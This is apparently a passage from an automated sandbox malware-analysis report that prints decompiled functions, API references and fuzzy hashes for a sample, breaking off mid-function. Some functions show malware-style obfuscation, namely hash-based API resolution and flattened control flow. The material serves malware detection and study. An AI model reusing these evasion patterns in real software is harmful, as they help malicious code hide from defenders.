Function 0040A2E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A2E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t70;
				signed int _t76;
				void* _t78;
				void* _t82;
				intOrPtr _t83;

				_t82 = __eflags;
				_push(0x38);
				E0041F71D(E004323F0, __ebx, __edi, __esi);
				_push(0x4037fd);
				_t56 = E0040F584(__ebx, 0x44642c, __edi, __esi, _t82);
				_t83 = _t56;
				 *((intOrPtr*)(_t78 - 0x14)) = _t56;
				_t84 = _t83 == 0;
				if(_t83 == 0) {
					E004037E3(_t56, 0x44642c, __edi, __esi, _t84);
				}
				_t4 = _t56 + 0x58; // 0x58
				_t58 = 7;
				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
				_t70 =  *((intOrPtr*)(_t78 + 0x10));
				_t76 =  *(_t78 + 8);
				 *_t39 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
				 *((intOrPtr*)(_t78 - 4)) = 0;
				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t70 == 0x110) {
					E004089E1(_t76, _t78 - 0x28, _t78 + 8);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x108))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t70 == 0x110) {
					E0040A26C(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
				}
				_t30 = _t56 + 0x58; // 0x58
				_t62 = 7;
				return E0041F7C2(memcpy(_t30, _t78 - 0x44, _t62 << 2));
			}

0x0040a2e8
0x0040a2e8
0x0040a2ef
0x0040a2f4
0x0040a303
0x0040a309
0x0040a30e
0x0040a311
0x0040a313
0x0040a315
0x0040a315
0x0040a31a
0x0040a321
0x0040a325
0x0040a32a
0x0040a330
0x0040a333
0x0040a338
0x0040a33e
0x0040a341
0x0040a344
0x0040a347
0x0040a354
0x0040a354
0x0040a357
0x0040a361
0x0040a36c
0x0040a36c
0x0040a388
0x0040a38b
0x0040a395
0x0040a395
0x0040a3c4
0x0040a3c7
0x0040a3d2

APIs

__EH_prolog3_catch.LIBCMT ref: 0040A2EF

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Strings

,dD, xrefs: 0040A2F9

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3$Exception@8H_prolog3_catchThrow
String ID: ,dD
API String ID: 24280941-3191229884
Opcode ID: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
Instruction ID: aadd303bf69657f6d7fcf57e1872b0adf1e10777afe3b3ca5e8b26921ca13ed5
Opcode Fuzzy Hash: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
Instruction Fuzzy Hash: 93214A72A00209DFCF15DF65C4819EE7BA6EF48314F11807AFD05AB281D738EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004011D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004011D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				char _v336;
				intOrPtr _v340;
				intOrPtr _v352;
				void* __ebp;
				signed int _t18;
				intOrPtr _t26;
				signed int _t42;

				_t39 = __edx;
				_t18 =  *0x443590; // 0xa920217c
				 *[fs:0x0] =  &_v16;
				_v352 = __ecx;
				__imp__#17(_t18 ^ _t42,  *[fs:0x0], E00431A3B, 0xffffffff);
				E00404019(_v352);
				E00407105(__ebx, __edi, 0);
				E00406622(__ebx, _v352, __edx, __edi, _t42, "Local AppWizard-Generated Applications");
				E00401450(__ebx,  &_v336, __edi, __esi, _t18 ^ _t42, 0); // executed
				_v8 = 0;
				 *((intOrPtr*)(_v352 + 0x20)) =  &_v336;
				_t26 = E0040638F(__ebx,  &_v336, _t39, __edi, __esi, _t18 ^ _t42); // executed
				_v20 = _t26;
				_v340 = 0;
				_v8 = 0xffffffff;
				E00401290( &_v336, _t18 ^ _t42);
				 *[fs:0x0] = _v16;
				return _v340;
			}

0x004011d0
0x004011e7
0x004011f2
0x004011f8
0x004011fe
0x0040120a
0x00401211
0x00401224
0x00401231
0x00401236
0x00401249
0x00401252
0x00401257
0x0040125a
0x00401264
0x00401271
0x0040127f
0x0040128a

APIs

#17.COMCTL32(A920217C), ref: 004011FE

Part of subcall function 00404019: InterlockedExchange.KERNEL32(00447344,?), ref: 00404045

Part of subcall function 00406622: __strdup.LIBCMT ref: 00406631
Part of subcall function 00406622: __strdup.LIBCMT ref: 00406644

Part of subcall function 0040638F: __EH_prolog3_catch.LIBCMT ref: 00406396
Part of subcall function 0040638F: FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
Part of subcall function 0040638F: LoadResource.KERNEL32(?,00000000), ref: 004063D1
Part of subcall function 0040638F: LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2

Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012E4
Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012F3

Strings

Local AppWizard-Generated Applications, xrefs: 00401219

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Resource$Task_impl__strdup$ExchangeFindH_prolog3_catchInterlockedLoadLock
String ID: Local AppWizard-Generated Applications
API String ID: 2756291502-3869840320
Opcode ID: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
Instruction ID: 0db303b2012f99e3f1afa8417c8b10c21545059f69079e666712292cf1c3cdd3
Opcode Fuzzy Hash: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
Instruction Fuzzy Hash: 06114870900618DBCB24EF54DC55BD9B7B4EB49715F1042AAE41A6B3E0DB382A04CF88

Uniqueness

Uniqueness Score: -1.00%

Function 02253037, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02253037(long __ecx) {
				void* _t2;
				void* _t4;
				long _t12;

				_t12 = __ecx;
				_t2 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0x71eb2479, 0x14d)))();
				E02252F84(0xf568ce83, 0x91b79ad5, 0x51);
				_t4 = RtlAllocateHeap(_t2, 8, _t12); // executed
				return _t4;
			}

0x02253038
0x0225304f
0x02253061
0x02253067
0x0225306a

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02253067

Strings

y$q, xrefs: 0225303A

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: AllocateHeap
String ID: y$q
API String ID: 1279760036-2681802098
Opcode ID: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
Instruction ID: c235e51f5a747a5278faa710b5053ca36645760c766eaaf8cf6074e2b9fce43d
Opcode Fuzzy Hash: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
Instruction Fuzzy Hash: C0D0C7212D533165F42C35F43C05FA60116DF99732F24C1057E385F1D8CEA68C418560

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F7, Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D3F7(void* __ecx) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t28;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t43;
				struct HINSTANCE__* _t44;
				intOrPtr _t45;
				void* _t47;
				intOrPtr _t48;
				signed int _t49;
				void* _t51;

				_t49 = _t51 - 0x1b0;
				_t28 =  *0x443590; // 0xa920217c
				 *(_t49 + 0x1ac) = _t28 ^ _t49;
				_push(_t43);
				_t47 = __ecx;
				E0040D31A(_t28 ^ _t49, _t38, __ecx, _t42, _t43, __ecx);
				_t44 =  *(__ecx + 8);
				 *(_t49 + 0x1aa) =  *(_t49 + 0x1aa) & 0x00000000;
				 *(_t49 + 0x1a8) =  *(_t49 + 0x1a8) & 0x00000000;
				if(GetModuleFileNameW(_t44, _t49 - 0x60, 0x105) != 0) {
					if( *(_t49 + 0x1a8) == 0) {
						 *((intOrPtr*)(_t49 - 0x78)) = _t49 - 0x60;
						_push(_t49 - 0x80);
						 *((intOrPtr*)(_t49 - 0x80)) = 0x20;
						 *((intOrPtr*)(_t49 - 0x7c)) = 0x88;
						 *((intOrPtr*)(_t49 - 0x6c)) = 2;
						 *(_t49 - 0x64) = _t44;
						_t32 = E0040D388(); // executed
						 *(_t47 + 0x80) = _t32;
						if(_t32 == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 3;
							_t32 = E0040D388(); // executed
							 *(_t47 + 0x80) = _t32;
						}
						if( *(_t47 + 0x80) == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 1;
							_t32 = E0040D388(); // executed
							 *(_t47 + 0x80) = _t32;
							if(_t32 == 0xffffffff) {
								 *(_t47 + 0x80) =  *(_t47 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t45);
				_pop(_t48);
				return E0041E5DF(_t32, _t38,  *(_t49 + 0x1ac) ^ _t49, _t42, _t45, _t48);
			}

0x0040d3f8
0x0040d405
0x0040d40c
0x0040d413
0x0040d414
0x0040d416
0x0040d41b
0x0040d41e
0x0040d426
0x0040d440
0x0040d44e
0x0040d45d
0x0040d463
0x0040d464
0x0040d46b
0x0040d472
0x0040d479
0x0040d47c
0x0040d484
0x0040d48a
0x0040d48f
0x0040d490
0x0040d497
0x0040d49c
0x0040d49c
0x0040d4a9
0x0040d4ae
0x0040d4af
0x0040d4b6
0x0040d4be
0x0040d4c4
0x0040d4c6
0x0040d4c6
0x0040d4c4
0x0040d450
0x0040d452
0x0040d452
0x0040d44e
0x0040d4d3
0x0040d4d6
0x0040d4e3

APIs

Part of subcall function 0040D31A: GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
SetLastError.KERNEL32(0000006F), ref: 0040D452

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Module$ErrorFileHandleLastName
String ID:
API String ID: 613274587-0
Opcode ID: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
Instruction ID: 4c084dd07903f31f2770e49e5958585a6a5082f204e8c6cb463d0be25484e369
Opcode Fuzzy Hash: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
Instruction Fuzzy Hash: 4C213D71D003088EEB60DFA5D8487EEB7B8BB05318F50463EE869AA1C1DB786549CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00422C5D, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422C5D(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4468d0 = _t6;
				if(_t6 != 0) {
					_t7 = E00422C02(__eflags);
					__eflags = _t7 - 3;
					 *0x448500 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E00422E5E(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x4468d0);
							 *0x4468d0 =  *0x4468d0 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x00422c6e
0x00422c76
0x00422c7b
0x00422c80
0x00422c85
0x00422c88
0x00422c8d
0x00422cb3
0x00422cb5
0x00422cb6
0x00422c8f
0x00422c94
0x00422c99
0x00422c9c
0x00000000
0x00422c9e
0x00422ca4
0x00422caa
0x00000000
0x00422caa
0x00422c9c
0x00422c7d
0x00422c7d
0x00422c7f
0x00422c7f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F5BB,00000001), ref: 00422C6E
HeapDestroy.KERNEL32 ref: 00422CA4

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
Instruction ID: 50605b1b86adc46f172317f474ea2ef838b38f67434d95992fa8f4b769136fec
Opcode Fuzzy Hash: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
Instruction Fuzzy Hash: 9EE06D35715322BAEB047F32BF0576A36E4A742746F41443AF501C50A0FBB88550961E

Uniqueness

Uniqueness Score: -1.00%

Function 004080C3, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004080C3(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x40);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf0))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}

0x004080c7
0x004080c9
0x004080ce
0x004080f2
0x004080ff
0x00000000
0x004080ff
0x004080d8
0x004080dc
0x00000000
0x00000000
0x00000000

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 004080EA
CallWindowProcA.USER32 ref: 004080FF

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
Instruction ID: faabefe62c7c53f3fdcbf67010fdb8b980cc00f1b023ec64b7b1c68eccc98f5b
Opcode Fuzzy Hash: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
Instruction Fuzzy Hash: 84F0AC36100215EFCF119F94DC04DDA7BB9FF19350B058429FA85D6561EB72E820AF54

Uniqueness

Uniqueness Score: -1.00%

Function 004099F5, Relevance: 3.0, APIs: 2, Instructions: 18
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004099F5(void* __ecx) {
				struct HINSTANCE__* _t11;
				signed int _t12;
				void* _t15;

				_t15 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
					 *(_t15 + 4) = _t11;
					if(_t11 == 0) {
						_t12 = LoadLibraryA( *(_t15 + 0xc));
						 *(_t15 + 4) = _t12;
						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				return  *(_t15 + 4);
			}

0x004099f6
0x004099fc
0x00409a01
0x00409a09
0x00409a0c
0x00409a11
0x00409a19
0x00409a1f
0x00409a1f
0x00409a0c
0x00409a26

APIs

GetModuleHandleA.KERNELBASE(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A01
LoadLibraryA.KERNEL32(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A11

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
Instruction ID: 9317f629b01d5a5b7a74bb67438dee8f2f814220c5d55638b190b1096b737129
Opcode Fuzzy Hash: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
Instruction Fuzzy Hash: 80E0BF31612750CFC7248F29E9047877BE4EF14710711C47EE4AAD2A61E734EC40CB04

Uniqueness

Uniqueness Score: -1.00%

Function 004051C9, Relevance: 3.0, APIs: 2, Instructions: 15
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004051C9(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0040DB94(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E0040D673(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E00405035, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}

0x004051c9
0x004051ce
0x004051d2
0x004051d4
0x004051d5
0x004051ec
0x004051f2
0x00000000
0x004051f5
0x004051f6

APIs

GetCurrentThreadId.KERNEL32 ref: 004051DC
SetWindowsHookExA.USER32 ref: 004051EC

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID:
API String ID: 1904029216-0
Opcode ID: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
Instruction ID: d2475072599357dfe44180b5e05b1154fe7956b612fa810acb3a96ea88ad64ab
Opcode Fuzzy Hash: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
Instruction Fuzzy Hash: C7D0A771C046502EDB202FB07C0DB8B3B548B04370F1207B6F420761E1C97CA4854F9D

Uniqueness

Uniqueness Score: -1.00%

Function 022541DF, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {

				E022547EB();
				E02252F84(0xf568ce83, 0x87b42d4d, 0x1dc);
				ExitProcess(0);
			}

0x022541df
0x022541f5
0x022541fb

APIs

ExitProcess.KERNEL32(00000000), ref: 022541FB

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4e1fa8e6cbb4071dcb0aa49f4f876a2119f30f344a9f7933f784ea78dc4d0f45
Instruction ID: a99fad7a1b3e0ff3354db0af46632687ecf4f3a1b316908e21b941e19447d05e
Opcode Fuzzy Hash: 4e1fa8e6cbb4071dcb0aa49f4f876a2119f30f344a9f7933f784ea78dc4d0f45
Instruction Fuzzy Hash: CBB092222D0326B6F41875F01C19F8A50138BA6712F20CA062A226E1C88FA19592E524

Uniqueness

Uniqueness Score: -1.00%

Function 02241D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828b724592dbaa7f77a73f4835806f92a6371d7ccbb1b7ddea64374e2172481f
Instruction ID: d05c7bc32b1cebbee5e8a026d02848c6da3ecf7d3fdc1457ad487c81d5927418
Opcode Fuzzy Hash: 828b724592dbaa7f77a73f4835806f92a6371d7ccbb1b7ddea64374e2172481f
Instruction Fuzzy Hash: DD41BA78A10109EFDB08CF84C494BAAB7B2FF88314F24C159E9195F359C775EA92CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02255AA1, Relevance: 1.6, APIs: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E02255AA1() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				void* _v572;
				void* _t14;
				intOrPtr* _t17;
				void* _t19;
				intOrPtr* _t24;
				void* _t26;
				void* _t30;
				void* _t37;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t26 = _v572;
				_t41 = 0x17978d81;
				_t39 = 0;
				do {
					while(_t41 != 0xaceab63) {
						if(_t41 == 0xba3fea7) {
							_push(_t39);
							_push(_t39);
							_push(3);
							_push(_t39);
							_push(1);
							_push(0x80);
							_t37 = 0xb82a8ec3;
							_push( &_v524);
							E02252F84(0xf568ce83, 0xb82a8ec3, 0x1a);
							_pop(_t30); // executed
							_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
							_t26 = _t14;
							__eflags = _t26 - 0xffffffff;
							if(_t26 == 0xffffffff) {
								L19:
								return _t39;
							}
							_t41 = 0x308611ab;
							continue;
						}
						if(_t41 == 0x17978d81) {
							_t41 = 0x1f766521;
							continue;
						}
						if(_t41 == 0x1f766521) {
							_t37 = 0x738e43f2;
							_t17 = E02252F84(0xf568ce83, 0x738e43f2, 0x169);
							_t30 = _t39;
							 *_t17( &_v524, 0x104);
							_t41 = 0xba3fea7;
							continue;
						}
						if(_t41 == 0x269b685a) {
							_t19 = E0225438D(_t30, _t37);
							_t43 = _v572 - _v548;
							asm("sbb ecx, [esp+0x2c]");
							__eflags = _v568 - _t37;
							if(__eflags < 0) {
								goto L19;
							}
							if(__eflags > 0) {
								L18:
								_t39 = 1;
								__eflags = 1;
								goto L19;
							}
							__eflags = _t43 - _t19;
							if(_t43 < _t19) {
								goto L19;
							}
							goto L18;
						}
						if(_t41 == 0x308611ab) {
							 *((intOrPtr*)(E02252F84(0xf568ce83, 0x854b8830, 0x4c)))();
							_t37 = 0x2e998fdc;
							asm("sbb esi, esi");
							_t41 = (_t41 & 0xe8cf945b) + 0x21ff1708;
							_t24 = E02252F84(0xf568ce83, 0x2e998fdc, 0x167);
							_t30 = _t26;
							 *_t24(_t26, _t39,  &_v564, 0x28);
						}
						goto L13;
					}
					_push( &_v572);
					 *((intOrPtr*)(E02252F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
					_t41 = 0x269b685a;
					L13:
				} while (_t41 != 0x21ff1708);
				goto L19;
			}

0x02255aa8
0x02255aaf
0x02255ab4
0x02255abb
0x02255abb
0x02255acd
0x02255b76
0x02255b77
0x02255b78
0x02255b7a
0x02255b7b
0x02255b7d
0x02255b86
0x02255b8b
0x02255b90
0x02255b95
0x02255b96
0x02255b98
0x02255b9a
0x02255b9d
0x02255bf7
0x02255c03
0x02255c03
0x02255b9f
0x00000000
0x02255b9f
0x02255ad9
0x02255b6c
0x00000000
0x02255b6c
0x02255ae5
0x02255b4c
0x02255b5a
0x02255b5f
0x02255b60
0x02255b62
0x00000000
0x02255b62
0x02255aed
0x02255bd5
0x02255bde
0x02255be6
0x02255bea
0x02255bec
0x00000000
0x00000000
0x02255bee
0x02255bf4
0x02255bf6
0x02255bf6
0x00000000
0x02255bf6
0x02255bf0
0x02255bf2
0x00000000
0x00000000
0x00000000
0x02255bf2
0x02255af9
0x02255b17
0x02255b1b
0x02255b21
0x02255b30
0x02255b36
0x02255b3b
0x02255b3c
0x02255b3c
0x00000000
0x02255af9
0x02255bb2
0x02255bc0
0x02255bc2
0x02255bc7
0x02255bc7
0x00000000

APIs

CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000,?,2895FB0B,?,?), ref: 02255B96

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
Instruction ID: 658cde1188410357af69adfb402181e1022538cb56737ff4a6b2cacdc9ebb420
Opcode Fuzzy Hash: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
Instruction Fuzzy Hash: C231B072A6433557D924A8DC4CC8E7FE29A8BC0320F94C11AFD55A72CCCE718D488792

Uniqueness

Uniqueness Score: -1.00%

Function 022535F0, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E022535F0(WCHAR* __ecx, WCHAR* __edx, int _a4, intOrPtr _a12) {
				struct _PROCESS_INFORMATION _v20;
